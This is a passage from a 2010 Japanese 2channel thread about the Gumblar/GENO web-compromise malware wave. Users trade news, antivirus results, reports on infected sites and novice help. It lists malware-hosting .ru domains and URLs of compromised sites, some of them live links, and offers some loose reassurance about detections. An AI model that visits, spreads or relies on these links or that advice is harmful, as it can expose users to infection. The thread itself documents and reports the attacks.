2010/01/14(木) 17:43:50先頭部分が改ざんされてるけどめずらしい?
0546名無しさん@お腹いっぱい。
2010/01/14(木) 17:53:38runtimeだけが実際の利用者に関係する
あとは開発環境関係
0547名無しさん@お腹いっぱい。
2010/01/14(木) 18:05:36wwwwwwwwwwwwwwwwwwwww
0548名無しさん@お腹いっぱい。
2010/01/14(木) 18:07:080549名無しさん@お腹いっぱい。
2010/01/14(木) 18:10:32>Infostealer.Kenzero
アダルトゲームのsetup.exeを装い、個人情報を晒すトロイの木馬
ttp://internet.watch.impress.co.jp/docs/news/20091201_332607.html
「Infostealer.Kenzero」は、ファイル共有ソフト「Share」のネットワーク上で、
アダルトゲームの偽のインストールファイル(setup.exe)として流通しており、
複数のゲームタイトルにこのファイルが含まれることが確認されたという。
ダウソ厨専用。Gumblarとは全く関係がない。
http://hideyoshi.2ch.net/download/
0550名無しさん@お腹いっぱい。
2010/01/14(木) 18:11:01< ・、,,,;;,)
< つ=つ
ノ ノ三)
∠、 m)=m)
ガンプラー
(2009 〜 )
0551名無しさん@お腹いっぱい。
2010/01/14(木) 18:13:28株式会社ロマンシング(笑 ですね、わかります
0552名無しさん@お腹いっぱい。
2010/01/14(木) 18:27:11Last-Modifiedが読み込んだ日時になる。
つまり動的に生成しているページ。
ヘッダをいろいろ隠しているのであれだけど
(これ自体は攻撃者に対して鯖の環境を隠す点で有効)、
/index.php で同じのが帰るのでPHPと思われ。
元ファイルに適当に突っ込まれていると
どこに出てくるかわからんかったりする。
SQLインジェクションで適当にDBに突っ込んでたら
タグがエンコされて表示されて赤っ恥ってのはよくある。
0553名無しさん@お腹いっぱい。
2010/01/14(木) 19:32:04「Gasblar.LP」と命名する
0555名無しさん@お腹いっぱい。
2010/01/14(木) 19:49:04コードがそのまんま表示されてワロタ
↓
ttp://fx.104ban.com/up/src/up12037.jpg
0556名無しさん@お腹いっぱい。
2010/01/14(木) 20:58:30ttp://genochk.crz.jp/index.php?url=http%3A%2F%2Fbirliktaekwondo.com%2F&hids=on&code=on&ua=IE7&chk=AUTO
そのまま表示されてるものを含めたら4つも埋め込まれてるw
0557名無しさん@お腹いっぱい。
2010/01/14(木) 21:52:57http://www.yomiuri.co.jp/net/security/goshinjyutsu/20100108-OYT8T00898.htm
FTPのIDとパスワードを盗まれるらしいけど、
AFPしか使わないMac使いの俺には別世界の話しだな。
0558名無しさん@お腹いっぱい。
2010/01/14(木) 21:53:57ttp://internet.watch.impress.co.jp/docs/news/20100114_342269.html
0559名無しさん@お腹いっぱい。
2010/01/14(木) 22:18:32JPCERTに申告したからと、自身のサイトが改ざんされたからこんなお知らせを出しただけ。
0560名無しさん@お腹いっぱい。
2010/01/14(木) 23:42:53ゼロではないけどホイホイなんでもインスコしてなきゃXPに比べればかなりマシってこと?
0561名無しさん@お腹いっぱい。
2010/01/14(木) 23:55:08今主流の8080は、UAC有効状態のVistaでも7でも脆弱性があったら突かれる。
0562名無しさん@お腹いっぱい。
2010/01/14(木) 23:55:05ダイアログでいったん止めてくれるからいきなり実行されることはないというだけ。
2000やXPでもHIPS付きのファイヤーウォールを入れてあればUACと同等の防止効果はある。
どっちにしても判断を誤って実効許可してしまえば同じこと。
0563561
2010/01/14(木) 23:56:37561 :名無しさん@お腹いっぱい。:2010/01/14(木) 23:55:08
562 :名無しさん@お腹いっぱい。:2010/01/14(木) 23:55:05
562と被ったが、時間がおかしいぞ・・とw
0564562
2010/01/15(金) 00:07:46ずいぶん前に別の板での話だが、どういうわけかレスを返した相手とIDが被ったことがあって
自作自演ではないと説明するのに一苦労したことがある。
0565名無しさん@お腹いっぱい。
2010/01/15(金) 00:18:390566名無しさん@お腹いっぱい。
2010/01/15(金) 00:24:15ID被りは稀だけど
0567名無しさん@お腹いっぱい。
2010/01/15(金) 00:24:48許可の可否を求める
ダイアログ、ってこのウイルスの場合は具体的にどんなメッセージが表示されるのかな?
毎回違う?
0568名無しさん@お腹いっぱい。
2010/01/15(金) 02:50:35「HIPS セキュリティ」「HIPS システム保護」とかでググれ
0569名無しさん@お腹いっぱい。
2010/01/15(金) 02:54:460570名無しさん@お腹いっぱい。
2010/01/15(金) 07:00:40ttp://blogs.itmedia.co.jp/yohei/2010/01/gumblarwebpc-db.html
0571名無しさん@お腹いっぱい。
2010/01/15(金) 07:07:07ttp://www.virustotal.com/zh-cn/analisis/5e92dd5fe8561605a0ecb138725d27373503d129195357edf3e8eef6a0a4685c-1259371503
安全特警は完全地支持
0572名無しさん@お腹いっぱい。
2010/01/15(金) 11:34:50トロイ本体への対応は早い場合が多いね
やばいJSやPDFはしっかり検出するがトロイ本体はスルーか、やばいJSやPDFはスルーでトロイ本体は検出か、
どっちがいいんだろ
0573名無しさん@お腹いっぱい。
2010/01/15(金) 11:39:520574名無しさん@お腹いっぱい。
2010/01/15(金) 11:55:530575名無しさん@お腹いっぱい。
2010/01/15(金) 11:58:31>>266
0576名無しさん@お腹いっぱい。
2010/01/15(金) 13:12:47スターダストプロモーション の stardustpress HPも感染してます。
MS Security Essentials が検知して助かりました。
_ttp://sd-g.jp/stardustpress/04/index.html
公的機関で どこの報告あげれば良いでしょうか?
0577名無しさん@お腹いっぱい。
2010/01/15(金) 13:24:470578名無しさん@お腹いっぱい。
2010/01/15(金) 13:25:41あやうくクリックしかけただろうがボケ
0579名無しさん@お腹いっぱい。
2010/01/15(金) 13:41:190580名無しさん@お腹いっぱい。
2010/01/15(金) 13:51:220581名無しさん@お腹いっぱい。
2010/01/15(金) 13:58:46おそらく鯖の設定ミス
0582名無しさん@お腹いっぱい。
2010/01/15(金) 14:02:21なるほど
サンクス
0583名無しさん@お腹いっぱい。
2010/01/15(金) 14:08:16フィッシングの可能性もあるので注意
0584名無しさん@お腹いっぱい。
2010/01/15(金) 14:15:25年金個人情報提供サービスのところにアクセスしたら出たからフィッシングだったらヤバいかも
0585sage ◆sage/xLnlI
2010/01/15(金) 14:31:21発行者www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
発行先www3.IDPASS-NET.nenkin.go.jp
0586名無しさん@お腹いっぱい。
2010/01/15(金) 14:37:12よくわからんけど問題無し?
0587名無しさん@お腹いっぱい。
2010/01/15(金) 14:44:54だが証明書は手続きが面倒なので変更しない
このパターンは有り得る
0588名無しさん@お腹いっぱい。
2010/01/15(金) 14:45:27アーバン・コスモ・グループが「不明」になってるけど
Googleのキャッシュを見たら/*GNU GPL*/だった。
↓アクセス注意↓
tp://74●125●153●132/search?q=cache:KOi5Qv7rfXkJ:www.aikensetsu.com/+%E3%82%BB%E3%83%B3%E3%83%81%E3%83%A5%E3%83%AA%E3%83%BC21%EF%BC%88%E6%A0%AA%EF%BC%89%E3%82%A2%E3%82%A4%E5%BB%BA%E8%A8%AD%E6%B8%8B%E8%B0%B7%E6%94%AF%E5%BA%97&cd=1&hl=ja&ct=clnk&gl=jp
0589名無しさん@お腹いっぱい。
2010/01/15(金) 14:51:27そういうものか
サンクス
0590名無しさん@お腹いっぱい。
2010/01/15(金) 14:55:39ttp://blogs.technet.com/jpsecurity/archive/2010/01/15/3305843.aspx
0591名無しさん@お腹いっぱい。
2010/01/15(金) 14:57:50IE8は大丈夫だった
0592名無しさん@お腹いっぱい。
2010/01/15(金) 18:49:00さっさとIE8にしろってことだよな。
ところでMac OSは今回Acrobatのアップデータをするなだってさ。
影響を受けるOS:PowerPC&Intel両方
問題を起こすアップデータ:Acrobat8&AdobeReader8(8.2.0)
影響を受けるアプリ:Illustrator CS&CS2 InDesign CS&CS2
ttp://blogs.adobe.com/iwamoto/2010/01/acrobat.html
0593名無しさん@お腹いっぱい。
2010/01/15(金) 19:02:44http://www.itmedia.co.jp/enterprise/articles/1001/15/news059.html
>Internet Explorerに存在する未修正の脆弱性を狙う攻撃が確認されたことを受けて、
>国内のセキュリティ機関も回避策などを緊急情報として公開した。
>このほどGoogleなど米企業数十社が被害に遭った攻撃では、攻撃手法の一部がIE 6を
>標的にしていたことが判明。Microsoftの調査で、IE 5.01を除くIE 6以上の全バージョンが
>影響を受けることが分かった。なお、IE 6以外のバージョンを狙った攻撃は確認されていない。
0594名無しさん@お腹いっぱい。
2010/01/15(金) 19:03:08ここまた書き換えてあるんじゃね?
0595名無しさん@お腹いっぱい。
2010/01/15(金) 19:10:350596名無しさん@お腹いっぱい。
2010/01/15(金) 19:13:38スクリプトって眺めてると ^^ とか ^e^ とかあってなんか腹立つな
変な顔文字使うなころすぞって
0597名無しさん@お腹いっぱい。
2010/01/15(金) 19:14:08http://www.itmedia.co.jp/news/articles/0908/17/news018.html
0598名無しさん@お腹いっぱい。
2010/01/15(金) 19:34:19今度はIEの未修正の脆弱性を狙ってくるということか
感染者が大規模になるな
0599名無しさん@お腹いっぱい。
2010/01/15(金) 19:39:230600名無しさん@お腹いっぱい。
2010/01/15(金) 19:49:24Adobe Reader9.3とAcrobat6が入っているのですが、PDFファイルの関連付けを
Reader側にしておけば大丈夫でしょうか?
0601名無しさん@お腹いっぱい。
2010/01/15(金) 19:50:550602名無しさん@お腹いっぱい。
2010/01/15(金) 20:34:24自己レス
avast!が定義データ100115-0にて対応
JS:Illredir-CではなくJS:Illredir-Bで検出
結果: 14/41
ttp://www.virustotal.com/jp/analisis/893496a0ad2a7a9908373edfd75855d868e971748e38588ef1ff49572fdca94d-1263554923
0603名無しさん@お腹いっぱい。
2010/01/15(金) 20:34:400604名無しさん@お腹いっぱい。
2010/01/15(金) 20:43:380605名無しさん@お腹いっぱい。
2010/01/15(金) 23:05:54γ⌒ヽ
< ・、,,,;;,)
< つ=つ
ノ ノ三)
∠、 m)=m)
_,,_ ∩
(^Д^)/
⊂ ノ とったどー
(つ ノ
(ノ
0606名無しさん@お腹いっぱい。
2010/01/16(土) 03:39:44こんな事してる場合じゃないでしょ
0607名無しさん@お腹いっぱい。
2010/01/16(土) 11:30:19あまり語られていないな。
0608名無しさん@お腹いっぱい。
2010/01/16(土) 11:44:360609名無しさん@お腹いっぱい。
2010/01/16(土) 11:56:00ネットの海で0円生活
伝説達成だなw
0610名無しさん@お腹いっぱい。
2010/01/16(土) 12:05:47それで、納品物が改竄されたことに気づかず納品してしまい、
事件とになり契約を切られるわけですね。
発注元から、納品物の改竄チェックを要求されるはずなんだけどな。
0611610
2010/01/16(土) 12:10:28現場(客先)にくるソフト会社のSE・CEに「客のパソコンやサーバでWebサイト見るな」
といお達しでないのかな。とくにサーバメンテナンスとかできて、サーバ使うときとかね。
0612名無しさん@お腹いっぱい。
2010/01/16(土) 12:14:480613611
2010/01/16(土) 12:24:41AdobeReader入れてる。
そこで、うちにくる大手のSEに「以前までは許可していたけど、対策で切るまで
ダメね。」とつたえたら
SE「PDFはみませんよ」
といってたのでそれじゃダメだろと説明することになった。
(説明で本人も納得)
まだ、危険性が浸透していないな。
0614名無しさん@お腹いっぱい。
2010/01/16(土) 12:26:33http://ppcdesu●com/keyword/
0615名無しさん@お腹いっぱい。
2010/01/16(土) 12:37:410616名無しさん@お腹いっぱい。
2010/01/16(土) 12:52:52ttp://www.smilebanana.com/archives/2010/01/14-1912.php
この人の実験を読んでみるに、AdobeとかJavaとか以前にWindowsにSPすら当てていないPCで
管理されているページが多いってことなのかね。
0617名無しさん@お腹いっぱい。
2010/01/16(土) 13:32:53もちょっとわかりやすく頼む
0618名無しさん@お腹いっぱい。
2010/01/16(土) 13:50:51PDFを開かないから大丈夫と思い込んでたんだろそのSEは
インストールされてるだけでダメなのを知らずに
デフォルトでreaderのjavascriptがONになってるのも知らないだろうし
0619名無しさん@お腹いっぱい。
2010/01/16(土) 13:53:07xPのSP2、リーダーは9.1、IEは6のまま。
恐ろしいことに、管理者権限有のネット担当課の端末も同じ状態。
昨年から何度も更新しろと言ってるのに、検討している以外の答えなし。
なのに先週は、ガンブラーのチェックしろと言って、昨年秋に作成された
GENOの説明書送ってきやがった。
ネット管理を某大手民間に委託してもこれかよ、どれだけIT業界弱いんだよ。
管理者権限なくても、現にUSBマルウェア感染は大量に出ていて
使用禁止令が出てるんだが、それ以前の問題だろ。
脆弱性対策も、その何が危険なのかの職員向け説明もないままで、
今後管理者権限なくても発動するウィルスに化けたらどうするんだ。
つか、現時点では管理者権限なしなら大丈夫だよな?この前提が
崩れるなら、ネット全面禁止すべきだよな。役所の全端末がボット化
なんて想像したくもない。
0620名無しさん@お腹いっぱい。
2010/01/16(土) 14:04:02痛い目みてなんぼ
0621名無しさん@お腹いっぱい。
2010/01/16(土) 14:13:38会社のサーバの中見てたら去年のGENOがそのまま残ってるんだが・・・GENOとGumblarの同居とか
0622名無しさん@お腹いっぱい。
2010/01/16(土) 15:17:08ttp://www.yodobashi.com/ec/promotion/newtopics/detail/10000000000000005200/index.html
>「ウイルスバスター2010」を自信を持っておすすめします。
こんなもの(ザルセキュリティ)をオススメするなよ・・・
あと、URLを何とかしろwww
0623名無しさん@お腹いっぱい。
2010/01/16(土) 15:27:16改ざんされるのはサーバ上のファイルだけでしょ
オリジナルファイルは別にあるんじゃないの?
0624名無しさん@お腹いっぱい。
2010/01/16(土) 16:33:360625名無しさん@お腹いっぱい。
2010/01/16(土) 16:36:590626名無しさん@お腹いっぱい。
2010/01/16(土) 16:44:58> 脆弱性対策も、その何が危険なのかの職員向け説明もないままで、
> 今後管理者権限なくても発動するウィルスに化けたらどうするんだ。
説明して理解できる職員が何人居るやら・・・と、
某役所のアウトソースを引き受けてる俺が言ってみる。
「Adobe ReaderのJavaScript切れ」とは簡単に言えんのよ。
性格の悪い役人は「何できらにゃいかんのじゃゴルァ」とか
「切って何かあったら責任とってくれるんかゴルァ」とか言ってくる。
もちろん本音は面倒で設定変更したくないだけ。
だから、有効なソースを出して納得させないといけない
(反論の余地を与えないようにしないといけない)んだけど、
特に今回の場合Gunblarと8080系がごっちゃになってる状況で
8080系についてまともに解説してるのは個人のブログのような
ソースにできないものが殆だったから、レポートが思うように出せなかった。
IEが6のままってのも、移行にかかわる費用が捻出できんのでしょ。
偉い人から、「IE6はWinXPサポート終了までサポートされてるけど、なんで今わざわざ移行せにゃならんの?」
「既存のシステムの検証周りはWin7全面移行時でいいんじゃないの?」ってな感じで。
0627名無しさん@お腹いっぱい。
2010/01/16(土) 16:51:120628名無しさん@お腹いっぱい。
2010/01/16(土) 17:10:06まだまだよくわからない箱なんだよ。
設定変えて動かなくなった経験はみんなあって、
それが変にいじることへの抵抗になってる気がする。
0629名無しさん@お腹いっぱい。
2010/01/16(土) 18:10:11うんこシス管(脆弱性放置)が多いから
ttp://all-freesoft.net/soft/vulnerability/f-secureexploitshield/f-secureexploitshield.html
こういうものが作られたんだろうな。
0630名無しさん@お腹いっぱい。
2010/01/16(土) 18:10:55>xPのSP2、リーダーは9.1、IEは6のまま
業務システムなんかのの動作検証ができていない(検証すると金かかる。
不具合が出れば修正にさらに金かかる)ため同じようなとこあるよ。
XPSP2→SP3は、自動更新ではきつい(アップデートに時間がかかりすぎて
利用者からのクレームのもとになる)。だから人手にたよることになるため
お金がかかる(台数が多いと)。
Readerも自動更新の仕組みができていないと人手にたよるので更新にお金がかかる。
だから、そのままの会社(特に大企業)が多いんじゃないかな。
0631名無しさん@お腹いっぱい。
2010/01/16(土) 19:17:09役所だと、担当者ではなく、業者の責任にするんじゃなすかな。
>>626
>特に今回の場合Gunblarと8080系がごっちゃになってる状況で
>8080系についてまともに解説してるのは個人のブログのような
>ソースにできないものが殆だったから、レポートが思うように出せなかった。
漏れもそう。ただ、役所や客にだすわけではないけど対策の報告作るのに考えちまったよ。
うちの会社はFWで社外向け8080の通信をブロックするようにしているから、8080系からは
守られたようだ。しかし、「FWがあるから大丈夫でしょ」という間違った認識をもたれると
困るので報告からははずした。
0632名無しさん@お腹いっぱい。
2010/01/16(土) 19:18:10結構多くの人が無防備な状態でパソコンを使っているのだろうね。
そりゃガンプラとか蔓延するわな。
0633名無しさん@お腹いっぱい。
2010/01/16(土) 19:23:47ウィンドウズ標準のFWが入ってるから何も問題はない
問題があったらお前が悪い
0634名無しさん@お腹いっぱい。
2010/01/16(土) 19:53:20ttp://www.nec.co.jp/pfsoft/ardence/
WindowsもLinuxみたいに主要なアプリはコマンド一発でアップデート出来たらいいのに
0635名無しさん@お腹いっぱい。
2010/01/16(土) 20:07:290636名無しさん@お腹いっぱい。
2010/01/16(土) 20:09:300637名無しさん@お腹いっぱい。
2010/01/16(土) 20:49:41どれ踏めばいいんだ?
0638名無しさん@お腹いっぱい。
2010/01/16(土) 21:23:560639名無しさん@お腹いっぱい。
2010/01/16(土) 21:26:09testしたいの?
改竄されたサイトで放置してる馬鹿サイトなら
http://pc11.2ch.net/test/read.cgi/sec/1261855221/879
↑ここにあるけど
1月15日22:47:50頃に修正されてる
0641名無しさん@お腹いっぱい。
2010/01/16(土) 21:56:47セキュリティソフトの販売コーナーのパソに張り紙がしてあったら笑えたな。
0642名無しさん@お腹いっぱい。
2010/01/16(土) 22:04:36穴を逐次埋めていくのではなく、アンチウイルスソフトやHIPS、ファイアーウォールを使用して、
穴があっても突くことが出来ないようにして穴が埋まったのと同等にする。
っていう考え方は存在するし、良く使われる。もちろん推奨されるものではないが。
いかに少ないコスト(金銭/人的リソース)でインシデント発生を防ぐかってのがあるからな。
どっかにこういうことをまとめてあったページがあったような気がするけど忘れた。
0643名無しさん@お腹いっぱい。
2010/01/16(土) 22:15:410644名無しさん@お腹いっぱい。
2010/01/16(土) 22:21:32じゃあ今回のウイルスはthechocolateweb.ruでホスティングされてるからChocolatewebになるのかな?
0645名無しさん@お腹いっぱい。
2010/01/16(土) 22:24:350646名無しさん@お腹いっぱい。
2010/01/16(土) 22:31:50ここまでハケーンしたの
ampsguide.ru
burkewebservices.ru
carswebnet.ru
guidebat.ru
lagworld.ru
suesite.ru
superaguide.ru
theatticsale.ru
theaworld.ru
thechocolateweb.ru
thelaceweb.ru
themobilewindow.ru
themobisite.ru
viewhomesale.ru
webdirectbroker.ru
webnetenglish.ru
webnetloans.ru
whosaleonline.ru
worldsouth.ru
worldwebworld.ru
0647名無しさん@お腹いっぱい。
2010/01/16(土) 22:56:21http://www.p-moon●net/
http://swdp.pecori●jp/
http://mdoh.mods●jp/
http://higata.sakura.ne●jp/
http://under.under●jp/
http://www.cute-max●net/
http://emika.babymilk●jp/
http://yuck.pepper●jp/
http://lovable.ciao●jp/
http://dp11046722.lolipop●jp/
あんまり見つからないなあ。終了したサイトのドメインでやってる宣伝サイトが
感染(配布)してることが多い?
0648名無しさん@お腹いっぱい。
2010/01/16(土) 23:00:37Quicksilver Malware Network | Unmask Parasites. Blog.
ttp://blog.unmaskparasites.com/2009/09/17/quicksilver-malware-network/
0649名無しさん@お腹いっぱい。
2010/01/16(土) 23:05:52珍走団的なダサい名前でいいよ
0650名無しさん@お腹いっぱい。
2010/01/16(土) 23:07:360651名無しさん@お腹いっぱい。
2010/01/16(土) 23:16:59(水銀のように)動きや変化が激しい
ってのがあるからだろう。
0652名無しさん@お腹いっぱい。
2010/01/16(土) 23:17:51一番上Dan's View Sourceと飛び先のチェックを撥ねてるっぽい。。。
0653名無しさん@お腹いっぱい。
2010/01/16(土) 23:23:02なるほど
0654名無しさん@お腹いっぱい。
2010/01/16(土) 23:57:49>良くHIPSやプロアクティブの事を言われる方を見受けますが実際は
>GENOウイルスには全く役に立ちませんでした
0655名無しさん@お腹いっぱい。
2010/01/17(日) 00:01:36エラー。お使いのオペレーティングシステムに推奨されたバージョンの Java がインストールされていません。
って出たんですけど古いバージョンってことかな?
0656名無しさん@お腹いっぱい。
2010/01/17(日) 00:05:08早急にアップデートしましょう
0657名無しさん@お腹いっぱい。
2010/01/17(日) 00:06:44ttp://images.google.com/images?oe=Shift_JIS&q=HIPS&um=1&ie=UTF-8&sa=N&hl=ja&tab=wi
ttp://images.google.com/images?oe=Shift_JIS&q=%E3%83%97%E3%83%AD%E3%82%A2%E3%82%AF%E3%83%86%E3%82%A3%E3%83%96&um=1&ie=UTF-8&sa=N&hl=ja&tab=wi
0658名無しさん@お腹いっぱい。
2010/01/17(日) 00:09:28JRE入れた記憶はあるの?
0659名無しさん@お腹いっぱい。
2010/01/17(日) 00:11:250660名無しさん@お腹いっぱい。
2010/01/17(日) 00:14:23最新チラシにガンブラー診断実施中とありますが
無知に付け込んで客を騙し金を巻き上げるのは如何なものかと
0661名無しさん@お腹いっぱい。
2010/01/17(日) 00:15:19Version 6 Update 18
0662名無しさん@お腹いっぱい。
2010/01/17(日) 00:16:17mjsk
0663名無しさん@お腹いっぱい。
2010/01/17(日) 00:17:460664名無しさん@お腹いっぱい。
2010/01/17(日) 00:20:02http://java.sun.com/javase/6/webnotes/6u18.html
0665名無しさん@お腹いっぱい。
2010/01/17(日) 00:22:020666名無しさん@お腹いっぱい。
2010/01/17(日) 00:26:560667名無しさん@お腹いっぱい。
2010/01/17(日) 00:27:47JavaSEって開発向けだろ?
被害があるとしたら明らかにJRE・・・
0668名無しさん@お腹いっぱい。
2010/01/17(日) 00:29:31ここから普通にJRE 6 Update 18がダウンロード出来る
0669名無しさん@お腹いっぱい。
2010/01/17(日) 00:32:040670名無しさん@お腹いっぱい。
2010/01/17(日) 00:35:01通報作業中だけど3番目と9番目のリンク先もぁぅぁぅ
ttp://horiken●ciao.jp/
ttp://eefy●fem.jp/
ttp://ko-akuma●jp/
2番目まで了
ttp://www.p-moon●net/ める
ttp://swdp●pecori●jp/ ろりぽ
0671名無しさん@お腹いっぱい。
2010/01/17(日) 00:39:19てかほかにもいっぱいあたー
0672名無しさん@お腹いっぱい。
2010/01/17(日) 00:51:01ttp://in-out●upper●jp/
ttp://www●linto●org/gannkaken/
ttp://www●bridal-lasik●com/
0673名無しさん@お腹いっぱい。
2010/01/17(日) 01:09:57以下のURLを2ch専用ブラウザで開いた所、nortonのAUTO-PROTECTが激しく反応し
固まったのですがこれは大丈夫なんでしょうか・・・・?
尚、検出名は、Trojan.Malscript.Bとなっておりファイル元はIEのキャッシュファイルとなっています(IE使用型の2chブラウザです)
http://pc11.2ch.net/test/read.cgi/jisaku/1263466809/
0674名無しさん@お腹いっぱい。
2010/01/17(日) 01:19:07早くチェッカーできないかな・・・
0675名無しさん@お腹いっぱい。
2010/01/17(日) 01:36:14おお、通報ありがとうございます
0676名無しさん@お腹いっぱい。
2010/01/17(日) 01:38:04何故ここに来た?
2chの板はGENOと何も関係無いだろう
0677名無しさん@お腹いっぱい。
2010/01/17(日) 01:39:58対策ちゃんとしてれば良いよ
それ以上は無理する必要ないです
0678名無しさん@お腹いっぱい。
2010/01/17(日) 01:40:05危険かもしれない物を直リンするなタコ
さっさとクビをくくれ
0679名無しさん@お腹いっぱい。
2010/01/17(日) 01:40:58PC慣れてないのに自作板とな?
0680名無しさん@お腹いっぱい。
2010/01/17(日) 01:42:55ttp://www.aguse.jp/
0681名無しさん@お腹いっぱい。
2010/01/17(日) 01:46:52キャッシュ生成する専ブラも同様
そもそも、現在は既知のセキュリティホール内で収まっているから各ソフトウェアをアップデート
及びセキュリティソフトの定義を最新に保っておけば仮に直接踏みに言っても感染はしない
これから先は保証出来ないがな
0682名無しさん@お腹いっぱい。
2010/01/17(日) 02:00:54>>670-672のほかにもありそうだけどみなかったことにして、
4番目まで了
mdoh●mods●jp ろりぽ
higata●sakura●ne●jp さくら
あと11
0683名無しさん@お腹いっぱい。
2010/01/17(日) 02:07:490684名無しさん@お腹いっぱい。
2010/01/17(日) 02:10:330685名無しさん@お腹いっぱい。
2010/01/17(日) 02:21:32Trojan:Java/Selace.K
Exploit.Java/CVE-2008-5353.C
Trojan:Java/Selace.L
別に怪しいサイト踏んでないし、エロも海外も踏んでないのにどうして…
大丈夫でしょうか?
ウイルス対策ソフトはMSE使ってます。
ウイルスに感染したのは初めてでビビってます。
これが噂のガンブラーってやつですか?
>>2のテンプレ見てとりあえずadobe readerはアップデートしました。
windows updateも万全です。
Adobe Flash PlayerはPCに入ってませんでした。(買ったばかり)
それからjavaっていうのがよくわかりません。
じっぷらで質問スレ立てたら、javaをアップデートしたほうがよいと指摘されたんですが、
「java」で検索して出てくるプログラムは「java platform se binary」というので、
クリックしても一瞬画面にdosが出てくるだけで何も応答ありません。
ウイルス初心者です。初めての感染です。OSはWindows7です。よろしくお願いします。
0686名無しさん@お腹いっぱい。
2010/01/17(日) 02:23:400687685
2010/01/17(日) 02:26:46え?まじですか?
パソコンを購入時の状態に戻さないとダメですか?
駆除しましたけどこのままじゃダメですか?
0688名無しさん@お腹いっぱい。
2010/01/17(日) 02:27:240689名無しさん@お腹いっぱい。
2010/01/17(日) 02:29:36ウイルスを発見した場所はどこだ?
キャッシュなら問題ない
0690名無しさん@お腹いっぱい。
2010/01/17(日) 02:33:47すいません、返事遅くなって。UACってなんのことだがわからなくていろいろ調べてました。
パソコン起動したときに出てくるパスワード入力のことですね?
それだったら設定してます。
0691名無しさん@お腹いっぱい。
2010/01/17(日) 02:36:32不安ならオンラインスキャンも検査しとけよ。
http://ppcdesu.com/?sscv6/home.asp?langid=jp
http://www.puzzue.com/mv/?misc/onlinescan.html
0692名無しさん@お腹いっぱい。
2010/01/17(日) 02:38:05p://www●balbal●net/
この辺もあうあうあー
0693名無しさん@お腹いっぱい。
2010/01/17(日) 02:38:10ただし、UACなどユーザー操作はスルーしない。注意したいのはJREはクリーンアンインストール後に最新版を入れるように
しないと旧バージョンが残存していて感染の危険性はある
他二つもGumblar系だね
モロゾフに一式入っていた気がする
>別に怪しいサイト踏んでないし、エロも海外も踏んでないのにどうして…
海外も被害は出てるけど最近ではむしろ、日本国内の普通のサイトが危ないです
ほとんど無差別散布
ところで>>689が言ってるようにファイル元はどこ?
URLに反応しての遮断ではなく駆除なんだよね?
0694685
2010/01/17(日) 02:38:36今、MSEで削除したウイルスの履歴を見ました。
項目全てに「cashe」の文字が含まれているんですが、これはキャッシュという意味ですか?
問題ないんでしょうか?
0695名無しさん@お腹いっぱい。
2010/01/17(日) 02:41:24janeやその他主要専ブラだと画像サムネイル機能とかあるしそこから検出される事がよくある
馬鹿が面白がって貼りまくってるからな
0696名無しさん@お腹いっぱい。
2010/01/17(日) 02:43:23感染はしていないんじゃないかな?
0697685
2010/01/17(日) 02:47:02containerfile:C:\Users\(登録名)\AppData\Local\Temp|jar_cashe(以下数字羅列).tmp
こんな感じです。全部は書き出せませんが、全部これと同じ形式で表示されます。
「cashe]という文字が全てにあります。
なお、いまのところパソコンの動作にこれといって異常は感じていません。
0698名無しさん@お腹いっぱい。
2010/01/17(日) 02:49:32なら大丈夫でしょう、
検出されたということは事前に阻止されたという証拠
0699名無しさん@お腹いっぱい。
2010/01/17(日) 02:50:15avast反応せず・・・役に立たないねorz
でも良く発見出来たな、オレ。自分で自分を褒めたいです。
で、こちらXPSP3(2010年1月分のパッチ済み)、IE8でサイト閲覧したんだが、
avastでスキャンしたところどうも感染してなさそうなんだけど、そこで質問です。
・「IE7以前だと危険」という書き込みを見たが、IE8だと感染しないのか?
・avastだと感染してても検出しない? ウイルスバスター(オンラインスキャン)だと検出する?
やっぱカスペルスキー(オンラインスキャン)でチェックすべき?
・知り合いのサイトはネットショップなんだけど、「サイト感染してました」と注意喚起をトップに書いておくべき?
他にも質問があったんだが忘れた・・・回答お願いします。
ちなみに、オレの閲覧時のPC環境
adobe reader:9.10
flash player:不明(アップデート必要だった
java:不明(アップデート必要だった
0700685
2010/01/17(日) 02:52:42すごい安心しました。ありがとうございます。
最後にひとつだけ質問させてください。
アマゾンで買い物するのでクレカ情報盗まれたらどうしようって…心配だったんですが
その心配はないんでしょうか?
0701名無しさん@お腹いっぱい。
2010/01/17(日) 02:55:41クレカの情報を入力するときにウイルスが動いていたらキーボードの入力を盗むことが出来る
http://ja.wikipedia.org/wiki/%E3%82%AD%E3%83%BC%E3%83%AD%E3%82%AC%E3%83%BC
0702名無しさん@お腹いっぱい。
2010/01/17(日) 03:00:06今のPC買ったのが昨年の12/24です。
買ったばっかりです。
で、今までこのパソコンでネットショッピングしたことはありません。
とりあえず大丈夫ですよね?
0703名無しさん@お腹いっぱい。
2010/01/17(日) 03:00:28WEB弄られて踏み台にされるだけ
0704685
2010/01/17(日) 03:02:21みなさん夜遅くほんとうにありがとうございました。
0705名無しさん@お腹いっぱい。
2010/01/17(日) 03:02:340706名無しさん@お腹いっぱい。
2010/01/17(日) 03:06:590707名無しさん@お腹いっぱい。
2010/01/17(日) 03:09:45めんどくさくなったのでいっぺんに送った。
under●under●jp/ ろりぽ
www●cute-max●net/ ろりぽ
emika●babymilk●jp/ ろりぽ
yuck●pepper●jp/ ろりぽ
lovable●ciao●jp/ ろりぽ
dp11046722●lolipop●jp/ ろりぽ
horiken●ciao●jp/ ろりぽ
eefy●fem●jp/ ろりぽ
ko-akuma●jp/ ろりぽ
in-out●upper●jp/ ろりぽ
tarenagashi●boo●jp/ ろりぽ
あとふたつ
0708名無しさん@お腹いっぱい。
2010/01/17(日) 03:10:26avast!反応せずってそれ新型じゃねーの?
つか、どこのサイトだよ。
検体送付するから教えれ。
0710名無しさん@お腹いっぱい。
2010/01/17(日) 03:19:49ナニコレ
0711名無しさん@お腹いっぱい。
2010/01/17(日) 03:21:04もう修正しちまってるが、改ざんされたjsは1つ保存してる。
/*LGPL*/以降の難読化部分をうpればいいかな?
0712名無しさん@お腹いっぱい。
2010/01/17(日) 03:22:38Trojan.JS.Agent.baeってうあああああああああああああああああ
0713名無しさん@お腹いっぱい。
2010/01/17(日) 03:23:16スキャンで発見したならブロックできたわけじゃないんじゃね
買ったばかりならリカバリもすぐできるだろうしリカバリしたほうが
精神的にもいいよ
あとFlashPlayerは動画サイト見てれば入ってます
ヤフーのトップにある動く広告が見えてれば入ってます
Javaに関してはコントロールパネルからバージョンを確認するか
以下から確認してください
http://www.java.com/ja/download/installed.jsp
